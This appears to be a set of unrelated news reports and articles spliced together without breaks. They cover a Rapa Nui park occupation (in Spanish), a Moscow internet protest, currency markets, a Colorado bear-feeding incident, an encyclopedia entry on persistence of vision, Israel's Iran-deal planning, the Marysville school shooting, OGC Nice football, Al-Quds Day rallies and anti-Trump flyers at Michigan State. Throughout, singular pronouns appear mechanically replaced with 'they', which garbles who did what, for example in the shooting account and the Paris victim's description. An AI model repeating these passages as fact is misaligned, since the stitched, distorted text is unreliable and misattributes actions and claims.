Más de 110 días han transcurrido desde que el Rey de Rapa Nui , Valentino Riro , los representantes del Parlamento isleño y los distintos clanes decidieron ingresar al sitio sagrado que constituye el “ Parque Nacional Rapa Nui ” , el que desde 1973 administra el Estado a través de la Corporación Nacional Forestal ( Conaf ) . La medida busca reivindicar sentidas demandas para el pueblo como el lento trámite de la ley de control migratorio y el escaso avance en otros temas fundamentales para la Isla . Erity Teave , Presidenta del Consejo de Jefes de Clanes de Rapa Nui , afirmó que esto no es una toma , ni tampoco una ocupación , sino que los Rapa Nui son los dueños legítimos de ese patrimonio y de la Isla en su totalidad , ya que “ en 1933 Chile robó a la Isla su territorio , declarando con una inscripción fraudulenta e ilegal ” . La dirigente expresó que al ingresar a los sitios sagrados detectaron saqueos , lo que gatilló la rabia de los pascuenses que , desde hace años , demandan al Estado un texto legal que les permita tener control de la migración hacia la zona ante la sobrepoblación , la falta de bienes y la inseguridad que genera el constante tránsito por el territorio . La autoridad isleña recordó que después de las movilizaciones del 2010 y 2011 y una violenta represión nunca antes vista en la Isla , se instaló una mesa de diálogo que abordabael tema de la migración y que operó durante varios meses . Según señaló , las conclusiones de este trabajo se enviaron al Ejecutivo , que realizó cambios para permitir el ingreso libre al territorio , los que fueron rechazados por los isleños y , finalmente , el proceso quedó en nada . Rafael Tuki , consejero Rapa Nui para la Corporación Nacional Indígena ( Conadi ) , quien participó de estas negociaciones , afirmó que han existido varias medas de trabajo y que “ por eso no se quedan ” , pero indicó que ahora lo que falta es ver si realmente está la voluntad política de respetar sus derechos plenos . “ Al final siempre nos dicen que la Constitución garantiza el libre tránsito , pero ellos no pueden someternos a su Constitución , el diálogo debe ser bajo la Constitución chilena y los tratados Internacionales que están incluidos en ella y que garantizan el derecho de los pueblos a regirse por sus propias normas ” , afirmó . Para Tuki el problema de fondo pasa por la falta de disposición de las autoridades de aceptar la disposición de los pueblos de regirse por sus propias normas , como establecen los convenios internacionales y de paso criticó la falta de preocupación dentro del margen de la ley nacional : “ Rapa Nui está declarado Área de Desarrollo Indígena ( ADI ) , pero no nos respetan ” , sostuvo . En ese contexto es que el pueblo Rapa Nui acudió en enero a Tribunales Internacionales . Para los isleños , las conversaciones a nivel interno sólo han sido mecanismos de dilación . “ Estamos cansados , no hay tolerancia a la irresponsabilidad del Estado ” , expresó Erity Teave , quien pidió a la Presidenta Michelle Bachelet que responda las misivas que le envió tanto el Rey como los Clanes . Por lo pronto , los Rapa Nui no tienen intenciones de dejar el Parque , incluso afirmaron que pronto comenzarán a realizar ellos el cobro para conservar de forma adecuada el recinto . En la vereda opuesta , desde Conaf han mostrado su preocupación , porque desde el 26 de marzo no pueden cobrar la tarifa diferenciada a los turistas chilenos y extranjeros por el derecho de ingresar a la reserva natural , lo que les merma ingresos por mil millones de pesos al año , que se destinarían a proyectos de preservación de los sitios arqueológicos . La misma jefa provincial de Conaf en Isla , Ninoska Cuadros , afirmó a la prensa escrita que con esta toma arriesgan el financiamiento de proyectos de inversión del próximo año . Sin embargo , hasta el cierre de este informe , Radio Universidad de Chile intentó comunicarse con los organismos involucrados : La Conaf y el Ministerio del Interior , los que optaron por no hacer declaraciones .
The protest Saturday in Moscow followed a series of measures clamping down on internet use
The protest Saturday in Moscow followed a series of measures clamping down on internet use
ADVERTISING Read more
Moscow ( AFP )
About 1,000 Russians braved pouring rain in Moscow on Saturday to demonstrate against the government 's moves to tighten controls on internet use , with police arresting about a dozen protesters .
Shouting slogans such as `` Russia will be free '' and `` Russia without censorship '' , the protesters were escorted by several police officers , in a march authorised by local authorities .
Several were also marching in support of Khudoberdi Nurmatov , a reporter for the Russian opposition newspaper Novaya Gazeta , who faces deportation back to Uzbekistan over allegedly violating immigration laws .
Some of those were arrested , according to OVD-Info , a rights group that monitors detentions of activists , while an AFP photographer saw two protesters carrying rainbow flags detained .
In July , Russia 's parliament voted to outlaw web tools that let internet users sidestep official bans of certain websites .
It allows telecommunications watchdog Roskomnadzor to compile a list of so-called anonymiser services and prohibit any that fail to respect the bans , while also requiring users of online messaging services to identify themselves with a telephone number .
`` Innovation and technology will win ! We will defend our freedoms ! '' one protester said , according to a broadcast of the march on YouTube .
Russia 's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media .
But the Russian authorities have been clamping down on such online services , citing security concerns .
In June , Russian officials threatened to ban the Telegram messaging app after the FSB security service said it had been used by the attackers responsible for the deadly Saint Petersburg metro bombing in April .
© 2017 AFP
The Canadian dollar fell nearly two cents U.S. in the space of 24 hours as of Thursday afternoon .
The loonie was trading at 96.43 cents U.S. , down from 98.2 cents U.S. Wednesday afternoon .
The Canadian dollar 's value generally moves with commodity prices . Gold and oil prices plunged Thursday , amid the global stock market rout that began with U.S. Federal Reserve Chairman Ben Bernanke 's comment that the Fed 's stimulus program will start unwinding before the end of the year .
Gold fell to a two-and-a-half-year low of $ 1,286.20 U.S. , as of Thursday afternoon .
The Toronto Stock Exchange , which was already having a bad year , plunged nearly 300 points as of Thursday afternoon . The commodity-heavy exchange was experiencing the effects of falling resource prices .
Besides investor skittishness over the potential end to the Fed 's long-running , massive stimulus program , markets also reacted negatively to bad news out of China , where credit markets appear to be freezing up , in what the Washington Post called “ an unnerving parallel to the first days of the U.S. financial collapse . ”
Some U.S. investors have been betting on a collapse of the loonie , as well as declines in Canadian bank stocks , on the belief that declining commodity prices and a strained housing market will take their toll on Canada 's economy .
More to come ...
Also on HuffPost
Diners who visit one of 19 California Pizza Kitchen restaurants Monday , Jan. 25 and Tuesday , Jan. 26 will be able to have 20 percent of their bill donated to a fund to support Cal State Long Beach students studying design .
The restaurants include locations in Long Beach , Seal Beach , Lakewood and Cerritos . The fundraiser has been organized as a means to honor Nohemi Gonzalez , the 23-year-old Cal State Long Beach student who was slain during the November 2015 terrorist attacks in Paris .
Donations are to be given to the CSULB 49er Foundation in order to finance the planned renaming of the campus ' lower division design shop in Gonzalez 's honor and to subsidize new and upgraded equipment for design students , according to information from Design Department chairperson Martin Herman .
Gonzalez studied industrial design at the Long Beach campus before a terrorist 's bullet ended their lives . They were the only American to be killed in the Paris attacks , which resulted in the deaths of 130 people . The Islamic extremist group known as ISIS claimed responsibility for the violence .
Diners who wish to have a portion of their bills donated must present a flier to their server . The flier is available online at http : //bit.ly/1njSgJu
The Colorado Division of Wildlife is looking for two , maybe three potential Darwin Award recipients who bought hamburgers and cheeseburgers at the Burger King in Eagle on Wednesday and hand fed them to a mother black bear and their three cubs .
“ This is an extraordinary example of stupid and irresponsible behavior by people , ” said CDOW northwest regional manager Ron Velarde , according to RealVail.com . “ Because of their reckless actions , the sow and the cubs now know that people mean food . This dramatically increases the likelihood that these bears will get into trouble in the future and have to be put down . ”
So besides the obvious health risks of highly elevated cholesterol in humans , Whoppers may now prove deadly for local black bears . Burger King does n't have any legal exposure because the town of Eagle does n't have a bear-proof trashcan ordinance like nearby Vail or surrounding Eagle County . Four dead bears may change that , and anyone caught feeding wildlife can be hit with significant state fines .
According to CDOW , the bruins were drawn there by “ an improperly secured dumpster at the restaurant , attracting a small crowd of people. ” And so the next logical step was to help the bears out by going inside and ordering for them instead of forcing them to eat out of a nasty old dumpster .
CDOW officials hope anyone with information about the feeding incident will call them at ( 970 ) 947-2920 , although they acknowledge that the perps may be back in Kansas City , L.A. or Phoenix by now , given the restaurant 's proximity to Interstate 70 .
“ Many of these restaurants are places where people on their way to another part of the country stop to eat , so it 's possible that the people who fed the bears are long gone , ” area wildlife manager Perry Will said . “ But what might have started out as a great photo opportunity for them creates a big problem for us . Locals and visitors alike need to understand that we will not tolerate anyone putting our citizens and our wildlife at risk . ”
This article is about the optical illusion . For other uses , see Persistence of vision ( disambiguation )
[ 1 ] `` Persistence of Exposure '' as a visual art form , using an array of lights , waved back and forth in space , with the lights controlled by wearable computer
Persistence of vision traditionally refers to the optical illusion that occurs when visual perception of an object does not cease for some time after the rays of light proceeding from it have ceased to enter the eye . [ 2 ] The illusion has also been described as `` retinal persistence '' , [ 3 ] `` persistence of impressions '' , [ 4 ] simply `` persistence '' and other variations . According to this definition , the illusion would be the same as , or very similar to positive afterimages . [ 5 ]
`` Persistence of vision '' can also be understood to mean the same as `` flicker fusion '' , [ 6 ] the effect that vision seems to persist when a stream of light is repeatedly interrupted for very brief instances and ca n't really enter the eyes continuously .
Since its introduction , the term `` persistence of vision '' has been believed to be the explanation for motion perception in optical toys like the phenakistiscope and the zoetrope , and later in cinema . However , this theory has been disputed even before cinema was introduced in 1895 . If `` persistence of vision '' is explained as `` flicker fusion '' , it can be seen as an important factor in the illusion of moving pictures in cinema and related optical toys . In the stroboscopic effect of the thaumatrope the vision of one image seems to persist , despite the fact that actually two different parts of the image are presented alternately with very short interruptions in between . In film the vision of a moving or changing image seems to persist , despite the fact that a sequence of different images is presented with interruptions in between .
Early descriptions of the illusion often attributed the effect purely to imperfections of the eye , particularly of the retina . Nerves and parts of the brain later became part of explanations .
Sensory memory has been cited as a cause . [ 7 ]
Natural occurrences and applications [ edit ]
Some natural phenomena and the principles of some optical toys have been attributed to the persistence of vision effect .
Sparkler 's trail effect [ edit ]
The fact that a glowing coal appears as a line of light when it is moved around quickly has been used to illustrate the idea of persistence of vision . [ 2 ] It is known as the `` sparkler 's trail effect '' , named after the trail that appears when a sparkler is moved around quickly .
The effect has been applied in the arts by writing or drawing with a light source recorded by a camera with a long exposure time .
Color-top / Newton disc [ edit ]
Colors on spinning tops or rotating wheels mix together if the motion is too fast to register the details . A colored dot then appears as a circle and one line can make the whole surface appear in one uniform hue .
The Newton disc optically mixes wedges of Isaac Newton 's primary colors into one ( off- ) white surface when it spins fast .
Thaumatrope [ edit ]
In April 1825 the first Thaumatrope was published by W. Phillips ( in anonymous association with John Ayrton Paris ) . [ 8 ] The fact that the image of one side of the disc seems to blend with the image of the other side when it is looked at while it is twirled very fast , is often used as an illustration of persistence of vision .
Kaleidoscopic colour-top [ edit ]
In April 1858 John Gorham patented their Kaleidoscopic colour-top . [ 9 ] This is a top on which two small discs are placed , usually one with colors and a black one with cut-out patterns . When the discs spin and the top disc is retarded into regular jerky motions the toy exhibits `` beautiful forms which are similar to those of the kaleidoscope '' with multiplied colours . Gorham described how the colours appear mixed on the spinning top `` from the duration of successive impressions on the retina '' . Gorham founded the principle on `` the well-known experiment of whirling a stick , ignited at one end '' ( a.k.a . the sparkler 's trail effect ) . [ 10 ]
Rubber pencil trick [ edit ]
A pencil or another rigid straight line can appear as bending and becoming rubbery when it is wiggled fast enough between fingers , or otherwise undergoing rigid motion .
Persistence of vision has been discarded as sole cause of the illusion . It is thought that the eye movements of the observer fail to track the motions of features of the object . [ 11 ]
This effect is known as an entertaining `` magic '' trick for children . [ 12 ]
LED POV displays [ edit ]
The term `` persistence of vision display '' or `` POV display '' has been used for LED display devices that compose images by displaying one spatial portion at a time in rapid succession ( for example , one column of pixels every few milliseconds ) [ citation needed ] . A two-dimensional POV display is often accomplished by means of rapidly moving a single row of LEDs along a linear or circular path . [ citation needed ] The effect is that the image is perceived as a whole by the viewer as long as the entire path is completed during the visual persistence time of the human eye . [ citation needed ] A further effect is often to give the illusion of the image floating in mid-air . [ citation needed ] A three-dimensional POV display is often constructed using a 2D grid of LEDs which is swept or rotated through a volume . [ citation needed ] POV display devices can be used in combination with long camera exposures to produce light writing . [ citation needed ]
A common example of this can be seen in the use of bicycle wheel lights that produce patterns . [ citation needed ]
History [ edit ]
Although the theory of persistence of vision as the ( main ) reason we see film as motion has been disproved since 1912 , film historians have persisted in citing the theory as well as historical references to afterimages and similar illusions . The following developments are relevant to that story .
Historical references to afterimages [ edit ]
Aristotle ( 384–322 BCE ) noted that the image of the sun remained in their vision after they stopped looking at it .
The discovery of persistence of vision is sometimes attributed to the Roman poet Lucretius ( c. 15 October 99 BCE – c. 55 BCE ) , although they only mentions it in connection with images seen in a dream . [ 13 ]
Around 165 CE Ptolemy described in their book Optics a rotating potter 's wheel with different colors on it . They noted how the different colors of sectors mixed together into one color and how dots appeared as circles when the wheel was spinning very fast . When lines are drawn across the axis of the disc they make the whole surface appear to be of a uniform color . `` The visual impression that is created in the first revolution is invariably followed by repeated instances that subsequently produce an identical impression . This also happens in the case of shooting stars , whose light seems distended on account of their speed of motion , all according to the amount of perceptible distance it passes along with the sensible impression that arises in the visual faculty . `` [ 14 ] [ 15 ]
Porphyry ( circa 243–305 ) in their commentary on Ptolemy 's Harmonics describes how the senses are not stable but confused and inaccurate . Certain intervals between repeated impressions are not detected . A white or black spot on a spinning cone ( or top ) appears as a circle of that color and a line on the top makes the whole surface appear in that color . `` Because of the swiftness of the movement we receive the impression of the line on every part of the cone as the line moves . `` [ 16 ]
In the 11th century Ibn al-Haytam , who was familiar with Ptolemy 's writings , described how colored lines on a spinning top could not be discerned as different colors but appeared as one new color composed of all of the colors of the lines . They deducted that sight needs some time to discern a color . al-Haytam also noted that the top appeared motionless when spun extremely quick `` for none of its points remains fixed in the same spot for any perceptible time '' . [ 17 ]
Leonardo da Vinci was also curious about the phenomenon .
Isaac Newton ( 1642–1726/27 ) purportedly demonstrated how white light is a combination of different colors with a rotating disc with color segments . When spinning fast the colors seem to blend and appear as white ( or rather an off-white light hue ) . For an explanation they referred to the sparkler 's trail effect : a gyrating burning coal could appear as a circle of fire because `` the sensation of the coal in the several places of that circle remains impress 'd on the sensorium , until the coal return again to the same place . `` [ 18 ]
1820–1866 : Revolving wheels [ edit ]
An Optical Deception ( 1821 ) wood-cut illustration of ( 1821 )
Explanation of an Optical Deception in the Appearance of the Spokes of a Wheel Seen through Vertical Apertures ( 1825 ) Illustration plate for Peter Mark Roget 's ( 1825 )
Illustrations of Michael Faraday 's experiments with rotating wheels with cogs or spokes ( 1831 )
In 1821 the Quarterly Journal of Science , Literature , and The Arts published a `` letter to the editor '' with the title Account of an Optical Deception . It was dated Dec. 1 , 1820 and attributed to `` J.M . `` , possibly publisher/editor John Murray himself . [ 19 ] The author noted that the spokes of a rotating wheel seen through fence slats appeared with peculiar curvatures ( see picture ) . The letter concluded : `` The general principles on which this deception is based will , immediately occur to your mathematical readers , but a perfect demonstration will probably prove less easy than it appears on first sight '' . [ 20 ] Four years later Peter Mark Roget offered an explanation when reading at the Royal Society on December 9 , 1824 . They added : “ It is also to be noticed that , however rapidly the wheel revolves , each individual spoke , during the moment it is viewed , appears to be at rest . '' Roget claimed that the illusion is due to the fact “ that an impression made by a pencil of rays on the retina , if sufficiently vivid , will remain for a certain time after the cause has ceased. ” They also provided mathematical details about the appearing curvatures . [ 21 ]
As a university student Joseph Plateau noticed in some of their early experiments that when looking from a small distance at two concentric cogwheels which turned fast in opposite directions , it produced the optical illusion of a motionless wheel . They later read Peter Mark Roget 's 1824 article and decided to investigate the phenomenon further . They published their findings in Correspondance Mathématique et Physique in 1828 [ 22 ] and 1830 . [ 23 ] In 1829 Plateau presented their then unnamed anorthoscope in their doctoral thesis Sur quelques propriétés des impressions produites par la lumière sur l'organe de la vue . [ 24 ] The anorthoscope was a disc with an anamorphic picture that could be viewed as a clear immobile image when the disc was rotated and seen through the four radial slits of a counter-rotating disc . The discs could also be translucent and lit from behind through the slits of the counter-rotating disc .
On December 10 , 1830 scientist Michael Faraday presented a paper at the Royal Institution of Great Britain , titled On a Peculiar Class of Optical Deceptions , about the optical illusions that could be found in rotating wheels . They referred to Roget 's paper and described their relating new findings . [ 25 ] Much was similar to what Plateau had already published and Faraday later acknowledged this . However , a unique part of Faraday 's experiments concerned turning wheels in front of a mirror and this inspired Plateau with the idea for new illusions . In July 1832 Plateau sent a letter to Faraday and added an experimental circle that produced a “ completely immobile image of a little , perfectly regular horse ” when rotated in front of a mirror . [ 26 ] [ 27 ] After several attempts and many difficulties Plateau managed to animate the figures between the slits in a disc when they constructed the first effective model of the phénakisticope in November or December 1832 . Plateau published their then unnamed invention in a January 20 , 1833 letter to Correspondance Mathématique et Physique . [ 28 ]
Simon Stampfer independently and almost simultaneously invented their very similar Stroboscopischen Scheiben oder optischen Zauberscheiben ( stroboscopic discs or optical magic discs ) soon after they read about Faraday 's findings in December 1832 . [ 29 ]
Stampfer also mentioned several possible variations of their stroboscopic invention , including a cylinder ( similar to the later zoetrope ) as well as a long , looped strip of paper or canvas stretched around two parallel rollers ( somewhat similar to film ) and a theater-like frame ( much like the later praxinoscope ) . [ 29 ] In January 1834 , William George Horner also suggested a cylindrical variation of Plateau 's phénakisticope , but they did not manage to publish a working version . [ 30 ] William Ensign Lincoln invented the definitive zoetrope with exchangeable animation strips in 1865 and had it published by Milton Bradley and Co. in December 1866 . [ 31 ]
Other theories for motion perception in film [ edit ]
The idea that the motion effects in so-called `` optical toys '' , like the phénakisticope and the zoetrope , is caused by images lingering on the retina was questioned in an 1868 article by William Benjamin Carpenter . They suggested that the illusion was `` rather a mental than a retinal phenomenon '' . [ 32 ]
Narrowly defined , the theory of persistence of vision is the belief that human perception of motion ( brain centered ) is the result of persistence of vision ( eye centered ) . That version of the theory was discarded well before the invention of film and also disproved in the context of film in 1912 by Wertheimer [ 33 ] but persists in citations in many classic and modern film-theory texts . [ 34 ] [ 35 ] [ 36 ] A more plausible theory to explain motion perception ( at least on a descriptive level ) are two distinct perceptual illusions : phi phenomenon and beta movement .
A visual form of memory known as iconic memory has been described as the cause of this phenomenon . [ 37 ] Although psychologists and physiologists have rejected the relevance of this theory to film viewership , film academics and theorists generally have not . Some scientists nowadays consider the entire theory of iconic memory a myth . [ 38 ]
When contrasting the theory of persistence of vision with that of phi phenomena , an understanding emerges that the eye is not a camera and does not see in frames per second . In other words , vision is not as simple as light registering on a medium , since the brain has to make sense of the visual data the eye provides and construct a coherent picture of reality . Joseph Anderson and Barbara Fisher argue that the phi phenomena privileges a more constructionist approach to the cinema ( David Bordwell , Noël Carroll , Kirstin Thompson ) whereas the persistence of vision privileges a realist approach ( André Bazin , Christian Metz , Jean-Louis Baudry ) . [ 38 ]
See also [ edit ]
Dear Reader , As you can imagine , more people are reading The Jerusalem Post than ever before . Nevertheless , traditional business models are no longer sustainable and high-quality publications , like ours , are being forced to look for new ways to keep going . Unlike many other news organizations , we have not put up a paywall . We want to keep our journalism open and accessible and be able to keep providing you with news and analysis from the frontlines of Israel , the Middle East and the Jewish World .
WASHINGTON – Throughout international talks with Iran over its nuclear program , Israeli leadership offered a common refrain : Ten years may be a long time in the life of a politician , but it is nothing in the life of a nation .
In that spirit , Israel 's government is already planning for the expiration of several critical provisions in the deal that resulted from those talks , including two restrictions on Iran that sunset within the next few years on arms sales and its ballistic missile program .
Last month in Washington , Prime Minister Benjamin Netanyahu told The Jerusalem Post that they were working with the Trump administration on ways to mitigate the effects of some of the deal 's most challenging sunset clauses . For Israel , Iran is more dangerous if it abides by the deal than if it breaches it , they said.Netanyahu and Trump meet for first time in Washington at joint White House press conference on Feb. 15 , 2017 ( credit : REUTERS ) Asked if they could offer specifics on their strategy , Netanyahu replied , “ I could , but I won't. ” But those with their ear tell the Post that discussions have already begun , starting with a clause that lifts a UN ban on Iran 's ballistic missile work in just under seven years.That ban , in Annex B of UN Security Council Resolution 2231 , requires Iran “ not to undertake any activity related to ballistic missiles designed to be capable of delivering nuclear weapons , including launches using such ballistic missile technology. ” The provision also bans states from supplying , selling or transferring equipment , technology or training to Iran relevant to the advancement of that missile program.The decision to include such a provision – which extended for eight years what would have otherwise expired upon completion of the nuclear deal– was opposed by Russia and China during the talks . Moscow has been a top supplier of Iran 's missile programs for several years.Israel now believes that European nations , whose diplomats supported extending the ban during the nuclear negotiations , will be on board with a creative strategy that punishes Moscow through means outside of the UN should it choose to assist Iran with its continued missile work . The strategy would be to maintain de facto sanctions on Iran by threatening those that might supply it , despite the end of an explicit UN embargo against doing so.The plan already appears popular in Washington. “ Sanctioning Russia is as popular as it has ever been on the Hill right now , ” said one lobbyist with an Israel advocacy organization , discussing the emerging strategy . The lobbyist described the plan succinctly : Threatening new , tough sanctions on Moscow for its potential sale of ballistic missile components to Iran would kill two birds with one stone , targeting two of the world 's most destabilizing forces while gaining broad bipartisan support.While this particular UN provision expires in 2023 , Iran is expected to seek partners for collaboration well in advance . Thus Iran 's adversaries are likely to work backward against an unspecified date some time in the next few years.The Joint Comprehensive Plan of Action is intended to prevent Iran from ever building nuclear weapons , but Israel worries that sunset clauses on its work with fissile material will allow Tehran to build an industrial-sized nuclear program , providing the state with a nuclear capacity that could easily be converted into a weapons program on short notice.The deal allows Iran to expand the number of centrifuges it can use to enrich uranium , as well as the number of facilities it can use to host enrichment , in nine years . It also allows Iran to upgrade the centrifuges it has in use , from 1970s models to modern state-of-the-art machines . As the size and efficiency of their program advances – with full international legitimacy , under the nuclear deal – Israel fears it will be impossible to stop or even catch Iran should it choose to “ break out ” and build a weapon.Furthermore , should Iran instead choose to park itself right before a bomb and remain a nuclear-threshold state , Israel believes that Iran will maintain all of the strategic benefits a nuclear power enjoys without facing the costs that rogue nuclear states endure . Israeli leaders seek to prevent Iran from reaching this threshold stage.Speaking to the Post , several Israeli officials would only acknowledge that strategizing is under way to prevent these later sunset clauses from lapsing . No further details were provided .
Join Jerusalem Post Premium Plus now for just $ 5 and upgrade your experience with an ads-free website and exclusive content . Click here > >
Breaking News Emails Get breaking news alerts and special reports . The news and stories that matter , delivered weekday mornings .
Oct. 24 , 2014 , 6:28 PM GMT / Updated Oct. 25 , 2014 , 1:08 AM GMT
A Washington State high school `` homecoming prince '' opened fire in the cafeteria Friday , killing a girl and wounding four other people before fatally shooting himself , police and witnesses said .
A hospital official said three patients were in `` very critical condition '' with head wounds after the shooting at Marysville Pilchuck High School about 10:30 a.m. ( 1:30 p.m . ET ) . Two of them were later taken to a Seattle hospital , including a 15-year-old boy who remained in critical condition . Police said all of the wounded were under the age of 18 .
Police said the shooter , whom law enforcement sources identified as first-year student Jaylen Ray Fryberg , died of a self-inflicted gunshot wound . Classmates described them as popular , and just last week , they were crowned homecoming prince at a football game .
The motive for the shooting was unclear , although Fryberg posted a series of tweets that suggested a rocky romance . Students said they wore a blank stare as they silently began shooting , turning an ordinary lunch period into a tableau of terror and tragedy .
`` Just all of a sudden , I see them stand up , pull something out of their pocket , '' Austin Taylor , who had just finished eating lunch at the next table , told NBC station KING of Seattle .
Taylor said they heard one loud pop , then four more after that .
`` I saw three kids just fall from the table like they were falling to the ground dead , '' they said .
As the killer fiddled with the small pistol — a .40-caliber Beretta , according to law enforcement sources — Taylor ran from the cafeteria and into a classroom .
`` He had a blank stare , '' Taylor said . `` He was just staring at the victims as they shot them .
`` He was just calm during the whole thing , and they were perfectly fine the day before . Everyone knew him . ... They were always a very nice kid . ''
Another student , Alan Perez , said they also saw Fryberg pull out their weapon .
`` I just dropped my skateboard and ran as fast as I could , '' told KING . `` I saw they had a little gun in their hand and saw the flash from the muzzle of the gun . ''
A junior , Erick Cervantes , told NBC News that a woman in the cafeteria , possibly a teacher , rushed to intervene and grabbed Fryberg 's arm . They said the gunman tried to fire at the woman but ended up shooting themselves in the neck .
After 12 weeks of regular season play , OGC Nice sits atop Ligue 1 – 3 points clear of 2ndplace Monaco and 3rdplace PSG . My love for Ligue 1 developed during the Fall of 2012 , while I spent a 4-month work term in France . You would be hard-pressed not to find me on a train to Paris , watching Ibrahimovic and crew do battle at the Parc des Princes . Naturally , I became a staunch supporter of PSG – who at this point in time , were freshly flush with Qatari support and deeply disliked among the rest of French football supporters . While I still support PSG today – mostly in European competition – I ca n't help but smile when I see them sitting in 3rd place after 12 weeks . To see this amount of competition at this point in the season is extremely positive , especially for a league considered largely to be a one-horse team league .
Some have compared OGC Nice to the Leicester City of the premier league . While Leicester may have won many supporters during their harrowing campaign last year ( myself being one ) , much felt as though reality would soon sink in . Presently sitting 14thin the league , this appears to be the case ( European completion notwithstanding ) . I take issue with the parallels drawn between Leicester City and OGC Nice . I wish to highlight a few of the ways in which I believe OGC Nice 's rise to the top has them poised to sustain podium finishes for seasons to come .
Up until September 2013 , the home of OGC Nice was Stade Municipal du Ray – a quaint 86-year old stadium , which held 18 000+ supporters . In September of 2013 , OGC Nice broke the ground of their new home , the Stade Allianz Riviera against Valenciennes . Known as the ‘ little brother ' of Bayern Munich 's Allianz Arena , the Allianz Riviera came at a cost of over 250 million euro and can host just over 35 500 supporters . Unfortunately , the quality of Nice 's new home was not matched on the pitch . Les Aiglons narrowly avoided relegation , finishing 17thin the 2013-14 campaign . Supporters witnessed gradual improvements made during the 2014-15 campaign , but it was n't until 2015-16 when the collective mouths of Nice supporters began drooling at the prospects of European football . Hatem Ben Arfa 's resurrection , coupled with the rise and assurance of Valère Germain 's quality as a top-class striker lead the southern-side to a 4thplace finish , and direct entry into the Europe League group stage – it seemed as though the sultry rays of the Mediterranean sun was beginning to grace the Allianz Riviera .
In my opinion , it is quite likely that the events of Spring 2016 will prove the most long-lasting effects on the Mediterranean footballing organization . In the Spring of 2016 , an 80 % purchase of the team was made by a group of Chinese and American investors . This went largely unnoticed in the footballing world . OGC Nice president Jean-Pierre Rivere remained a 20 % owner , and is optimistic of the majority foreign ownership ; “ Their arrival secures the future of the club and will provide the additional resources for continuation of our vision . While keeping its identity and guidance , OGC Nice will gradually reach new heights ” .
Hastily and strategically , this new ownership group began putting their resources to use . OGC Nice 's ownership and sporting directors should be applauded for their ability to draw Lucien Favre – a 3-time award winner for Bundesliga 's manager of the year award ( ahead of the likes of Pep Guardiola , Jurgen Klopp , and Jupp Heynckes , I might add ) – into Ligue 1 . I applaud as well , the decision to bring Hatem Ben Arfa and Younes Belhanda back into the league , the acquisition of household names like Danté and Mario Balotelli – the latter being a bold and extremely high-risk , high-reward move . OGC Nice have an interesting blend of experienced players and a promising crop of young studs . This young group is lead by the likes of Alassane Plea ( 23 ) , the Wenger-supported Vincent Koziello ( 21 ) , Nice-native and Chelsea-target Malang Sarr ( 18 ) It appears as though Alassane Plea is ready to fulfill the lofty expectations given to them during their days as a resident of Olympique Lyonnais ' world-respected youth academy – sitting 3rdoverall in scoring with 7 league goals , behind only Cavani ( 11 ) and Lacazette ( 10 ) . This melange of managerial expertise , raw talent , and established veterans is an incredibly promising foundation from which OGC Nice look to reach new heights .
I would like to assert the fact that I am not discrediting Leicester 's remarkable season last year . I 'm highlighting the fact that with this new ownership group , Les Aiglons now have the resources and personnel necessary to compete with Ligue 1 's top sides , and in my opinion , the ability to compete for a European spot for the foreseeable future . As a devout follower of Ligue 1 for the past 5 seasons , It 's encouraging to see someone other than PSG or Monaco content for the title . This season , Nice already have notable victories over Marseille , Lyon , as well as a convincing 4-0 over southern rival Monaco ( who tout the highest goal-differential in all of European football ) .
Doubters will inevitably wait until Balotelli and co. face Ligue 1 powerhouse Paris Saint-Germain before affirming the quality of play OGC Nice have put on display thus far . Therefore , footballing experts and fans across Europe will be keen ( rightfully so ) to have the December 11th showdown at the Parc des Princes circled on their calendars .
Tens of thousands of Iranians taking part in an annual pro-Palestinian rally marched in Tehran , chanting `` Down with America '' and `` Death to Israel . ''
The rallies Friday come as Iran and six world powers hold talks in Vienna aimed at working out a deal to limit Iran 's nuclear program in exchange for easing tens of billions of dollars in economic penalties on the Islamic Republic .
Some protesters in Tehran burned Israeli and American flags . Media reports said similar rallies were held in other cities as well .
Iran does not recognize Israel and since the 1979 Islamic Revolution has observed the last Friday of the Islamic holy month of Ramadan as `` Al-Quds Day . '' Tehran says the occasion is meant to express support for Palestinians and emphasize the importance of Jerusalem for Muslims .
Iranian protesters mark 'Al-Quds Day ' in Tehran , July 10 , 2015 . ( Credit : AP )
Keep updated : Sign up to our newsletter Email * Please enter a valid email address Sign up Please wait… Thank you for signing up . We 've got more newsletters we think you 'll find interesting . Click here Oops . Something went wrong . Please try again later . Try again Thank you , The email address you have provided is already registered . Close
A burned picture of Benjamin Netanyahu at the Al-Quds Day protest in Tehran , July 10 , 2015 . ( Credit : AP )
An Iranian protester marks 'Al-Quds Day ' in Tehran , July 10 , 2015 . ( Credit : AP )
Former Iranian President Mahmoud Ahmadinejad at Al-Quds Day protest in Tehran , July 10 , 2015 . ( Credit : AP )
Cowards who refuse to identify themselves have sprinkled the campus of Michigan State University with flyers publicly shaming a professor for supporting Republican presidential nominee Donald Trump .
The professor , Joseph Guzman , is a statewide co-chair for Trump 's Michigan campaign and a member of Trump 's National Hispanic Advisory Committee , reports West Michigan Politics .
Emblazoned on each flyer are the words : “ Meet Your Professor ! ” followed by a photograph showing Guzman , sitting behind Trump at rally outside of Lansing last month .
The creators of the flyers helpfully identify Guzman 's face in the crowd behind Trump with a thick , bold , red circle .
Below the photo , the text of the flyer reads ( verbatim ) : “ Professor Guzman cheers on fascist oligarch waving a Make Amerika Great Again Sign . ”
Next , a pair of bullet points in a red box inform flyer viewers that “ Professor Guzman is a member of the National Hispanic Advisory Council for the Trump Campaign ” and that “ Guzman claims to represent the Hispanic community by advocating for unfair , and unequal working conditions for migrant workers that place them at the mercy of predatory bosses . ”
( The pointless comma is quoted verbatim . )
At the bottom of the flyer is “ Student testimony , ” which is a quote from a single student review of Guzman — at a website called Koofers .
The student review complains that Guzman “ brings in guest speakers ” — that part is in bold — and “ constantly tried to recruit people to join the humanities program. ” “ Waste of my time , ” the student critic gripes .
Guzman , a longtime Republican , said they think the public shaming because of their Hispanic origin and their support for Trump is unfair .
“ The First Amendment protects freedom of expression and association , particularly in the civic realm , ” Guzman told West Michigan Politics . “ It 's unfortunate some think that civic activity involves suppressing other individuals right to free speech with lies , smears and disruption . ”
Previously , in a statement obtained by the website , Guzman said they support Trump enthusiastically .
“ It is an honor to be a part of Mr. Trump 's National Hispanic Advisory Committee , ” Guzman said . “ I am energized and more convinced than ever that Donald Trump is the leader to move our nation and all our communities in the right direction . ”
Guzman , a former interim director of Michigan State 's Chicano and Latino Studies program , discussed their affiliation with the GOP and their support for Trump in an August interview with City Pulse , a Lansing website .
